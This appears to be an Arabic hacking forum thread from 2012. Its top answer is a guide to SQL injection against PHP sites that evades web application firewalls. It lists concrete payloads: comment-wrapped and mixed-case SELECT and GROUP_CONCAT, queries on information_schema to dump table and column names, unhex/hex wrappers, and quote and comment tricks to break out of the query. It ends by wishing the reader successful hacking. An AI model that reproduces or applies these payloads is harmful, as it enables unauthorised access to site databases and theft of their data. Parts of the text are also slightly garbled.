|
03-22-2012, 01:16 AM | رقم المشاركة : 1 (permalink) |
مجاب: not found عند حقن الموقع طلعة عدد الاعمد Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC not found | |
|
أفضل جواب - كتبه MO3ETH |
============================== أوامر تخطي Forbidden 403 اثناء استخراج العامود المصاب + استخراج الجداول ولأعمدة ============================== تخطي Forbidden 403 اثناء استخراج العامود المصاب ============================== اضافة الفلتر ============================== /*! */ ============================== على كلمة ============================== select ============================== لتصبح بهذا الشكل ============================== /*!select*/ ============================== واذا لم تنجح الطريقة العب بكلمة ============================== select ============================== لتصبح بهذا الشكل ============================== /*!SeLeCt*/ ============================== احرف سمول وأحرف كابتل ============================== تخطي Forbidden 403 اثناء استخراج الجداول ============================== التعديل بالأمر ============================== select ============================== ليصبح بهذا الشكل ============================== /*!SeLeCt*/ ============================== التعديل بالأمر ============================== group_concat(table_name) ============================== ليصبح بهذا الشكل ============================== /*!GrOuP_CoNcAT(table_name)*/ ============================== وتعديل الامر ============================== ليصبح بهذا الشكل ============================== +from+information_schema.tables+where+table_schema =database()-- ============================== تخطي Forbidden 403 اثناء استخراج الجداول ============================== التعديل بالأمر ============================== select ============================== ليصبح بهذا الشكل ============================== /*!SeLeCt*/ ============================== التعديل بالأمر ============================== group_concat(column_name) ============================== ليصبح بهذا الشكل ============================== /*!GrOuP_CoNcAT(column_name)*/ ============================== وتعديل الامر ============================== ليصبح بهذا الشكل ============================== +from+information_schema.columns+where+table_schem a=database()-- ============================== ليصبح بهذا الشكل ============================== + ============================== from+information_schema./*!columns*/+where+table_schema=database()-- ============================== أوامر تخطي Not Acceptable ============================== تخطي Not Acceptable اثناء استخراج العامود المصاب ============================== اضافة الفلتر ============================== /*! */ ============================== على كلمة ============================== select ============================== لتصبح بهذا الشكل ============================== /*!select*/ ============================== واذا لم تنجح الطريقة العب بكلمة ============================== select ============================== لتصبح بهذا الشكل ============================== /*!SeLeCt*/ ============================== احرف سمول وأحرف كابتل ============================== تخطي Not Acceptable اثناء استخراج الجداول ============================== التعديل بالأمر ============================== select ============================== ليصبح بهذا الشكل ============================== /*!SeLeCt*/ ============================== التعديل بالأمر ============================== group_concat(table_name) ============================== ليصبح بالشكل دا ============================== /*!GrOuP_CoNcAT(table_name)*/ ============================== تخطي Not Acceptable اثناء استخراج الجداول ============================== التعديل بالأمر ============================== select ============================== ليصبح بهذا الشكل ============================== /*!SeLeCt*/ ============================== التعديل بالأمر ============================== group_concat(column_name) ============================== ليصبح بالشكل دا ============================== /*!GrOuP_CoNcAT(column_name)*/ ============================== أوامر تخطي الحماية من بعض الأوامر ============================== هذا الأمر نضعه مكان العامود المصاب ============================== concat(unhex(hex(concat(table_name,0x3a,column_nam e,0x3a,table_schema)))) ============================== وهذا الأمر نضعه في نهاية الرابط ============================== +from+information_schema.columns-- ============================== أوامر تخطي عدم ظهور عدد الأعمدة ============================== نقوم باضافة ============================== +--+ ============================== في نهاية الرابط ============================== واضافة العلامة التي بين قوسين ============================== (') ============================== بعد ============================== .php?id=1 ============================== ليصبح بهذا الشكل ============================== .php?id=1' ============================== أرجو لك الإفادة و إختراق موفق |
03-22-2012, 01:29 AM | رقم المشاركة : 2 (permalink) |
رد: not found
| |
|
03-22-2012, 09:05 PM | رقم المشاركة : 3 (permalink) | |||||||||||||||||||||||
رد: not found
| ||||||||||||||||||||||||
|
مواقع النشر (المفضلة) |
|
|